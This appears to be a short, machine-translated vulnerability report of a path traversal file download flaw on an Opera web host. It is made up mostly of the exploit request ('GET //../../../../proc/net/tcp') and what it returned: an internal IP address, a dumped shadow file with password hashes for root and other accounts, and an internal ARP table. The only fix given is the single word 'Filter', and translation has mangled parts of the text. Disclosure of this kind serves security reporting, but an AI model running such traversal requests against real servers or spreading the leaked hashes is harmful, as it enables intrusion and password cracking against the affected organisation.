Download arbitrary files from a site in Opera (intranet root)
GET //../../../../../../../../proc/net/tcp HTTP/1.1Host: snow.opera.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4Accept: */*
Download/proc/net/tcp and get the local IP address 790FC30A, that is, 10.195.15.121root user, readable shadow:
Root: $6 $ 0yM1yOOM $ Ds. Logs. ghsTbMSRVN6jc8T1: 16330: 0: 99999: 7 :::
Daemon: *: 16330: 0: 99999: 7 :::
Bin: *: 16330: 0: 99999: 7 :::
Sys: *: 16330: 0: 99999: 7 :::
Sync: *: 16330: 0: 99999: 7 :::
Games: *: 16330: 0: 99999: 7 :::
Man: *: 16330: 0: 99999: 7 :::
Lp: *: 16330: 0: 99999: 7 :::
Mail: *: 16330: 0: 99999: 7 :::
News: *: 16330: 0: 99999: 7 :::
Uucp: *: 16330: 0: 99999: 7 :::
Proxy: *: 16330: 0: 99999: 7 :::
Www-data: *: 16330: 0: 99999: 7 :::
Backup: *: 16330: 0: 99999: 7 :::
List: *: 16330: 0: 99999: 7 :::
Irc: *: 16330: 0: 99999: 7 :::
Gnats: *: 16330: 0: 99999: 7 :::
Nobody: *: 16330: 0: 99999: 7 :::
Libuuid :! : 16330: 0: 99999: 7 :::
Debian-exim :! : 16330: 0: 99999: 7 :::
Statd: *: 16330: 0: 99999: 7 :::
Sshd: *: 16330: 0: 99999: 7 :::
Opera: $6 $. 8D0ABfy $ 3KNvEEwol. Mjnu0xLj5u // restart.: 16330: 0: 99999: 7 :::
Nagios: *: 16330: 0: 99999: 7 :::
Puppet: *: 16331: 0: 99999: 7 :::
Messagebus: *: 16331: 0: 99999: 7 :::
Munin: *: 16331: 0: 99999: 7 :::
Logcheck: *: 16331: 0: 99999: 7 :::
Mysql :! : 16331: 0: 99999: 7 :::
Tomcat6: *: 16331: 0: 99999: 7 :::
Usmanw :! : 16331: 0: 99999: 7 :::
Varnish: *: 16331: 0: 99999: 7 :::
Varnishlog: *: 16331: 0: 99999: 7 :::
Cosimo :! : 16331: 0: 99999: 7 :::
/Proc/net/arp
IP address HW type Flags HW address Mask Device
10.195.15.93 0x1 0x2 00: 1f: a0: 06: 63: bc * eth0
10.195.15.78 0x1 0x2 52: 54: 00: a5: cb: 5e * eth0
10.195.15.94 0x1 0x2 00: 1f: a0: 04: a3: fc * eth0
10.195.15.80 0x1 0x2 02: 1f: a0: 00: 00: 09 * eth0
10.195.15.65 0x1 0x2 00: 10: db: ff: 50: 00 * eth0
10.195.15.81 0x1 0x2 02: 1f: a0: 00: 00: 09 * eth0
10.195.15.66 0x1 0x2 00: 9c: 02: a5: 2f: 0a * eth0
10.195.15.67 0x1 0x2 00: 9c: 02: a5: 30: 22 * eth0
Solution:
Filter